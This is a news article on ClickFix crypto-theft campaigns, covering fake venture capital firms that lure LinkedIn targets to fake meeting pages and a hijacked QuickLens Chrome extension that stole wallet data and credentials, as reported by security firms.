Crypto hackers attempting to use “ClickFix” attacks to steal crypto have now turned to impersonating venture capital firms and hijacking browser extensions in their two most recent attacks.
According to a report by cybersecurity firm Moonlock Lab on Monday, scammers are using fake venture capital firms such as SolidBit, MegaBit and Lumax Capital. The hackers are using the firms to contact users via LinkedIn with partnership offers, then funneling them to fake Zoom and Google Meet links.
When a target clicks the fraudulent link, they are taken to an event page featuring a fake Cloudflare “I’m not a robot” checkbox. Clicking it copies a malicious command to the clipboard, prompting the user to open their computer’s terminal and paste the so-called verification code, which then executes the attack.
“The ClickFix technique is what makes the final step so effective,” the Moonlock Lab team said. “By turning the victim into the execution mechanism — having them paste and run the command themselves —the attackers sidestep the very controls the security industry has spent years building. No exploit. No suspicious download.”
Moonlock Lab alleges that a person using the name Mykhailo Hureiev, listed as the co-founder and managing partner at SolidBit Capital, has been a primary point of contact for the initial LinkedIn phase of the scam. Two X users have also reported suspicious conversations with a Hureiev account.
However, Moonlock Lab notes that the campaign’s infrastructure is sophisticated and designed to rotate identities as soon as one front is exposed.
Chrome extension hijacked to steal crypto
Meanwhile, crypto hackers have, until recently, been spreading a malicious Chrome extensionunder the guise of a “ClickFix” attack.
QuickLens, an extension that lets users run Google Lens searches directly in their browser, was removed from the web store after it was compromised to push malware, John Tuckner, the founder of cybersecurity firm Annex Security, said in a Feb. 23 report.
After QuickLens changed ownership on Feb. 1, a new version was released two weeks later containing malicious scripts that launched ClickFix attacks and other information-stealing tools. Tuckner noted that the extension had around 7,000 users.
The hijacked extension reportedly searched for crypto wallet data and seed phrases to steal funds. It also scraped the contents of Gmail inboxes, YouTube channel data, and other login credentials or payment information entered into web forms, according to a eSecurity Planet report on March 2.
ClickFix campaigns target multiple industries
The ClickFix technique has gained popularity among threat actors since last year, according to Moonlock Lab, because it forces victims to manually execute the malicious payload, bypassing standard security tools.
Related: February crypto losses hit lowest level since March 2025, says PeckShield
However, security researchers have been tracking its use since at least 2024, with targets spanning a wide range of industries.
Microsoft Threat Intelligence sent out a warning in August last year that it had been tracking “campaigns targeting thousands of enterprise and end-user devices globally every day.”
Meanwhile, cybersecurity company Unit42 reported in July last year that the “relatively new social engineering technique” has been impacting industries such as manufacturing, wholesale and retail, state and local governments, and utilities and energy.
Context
Current positioning around Security & Hacks remains sensitive to primary-source updates, policy interpretation, and execution risk across major venues.
What To Watch
Focus on incident-response updates, wallet flow tracking, and whether recovery or mitigation actions are independently verified.
Follow-up coverage should prioritize confirmed technical details, affected systems, and user-protection timelines rather than speculative loss estimates.
Related: More from Security & Hacks | OpenZeppelin: EVMbench Dataset Breaches Trust in Crypto Security | US Reclaim Millions Stolen in Romance Scam in Crypto Security
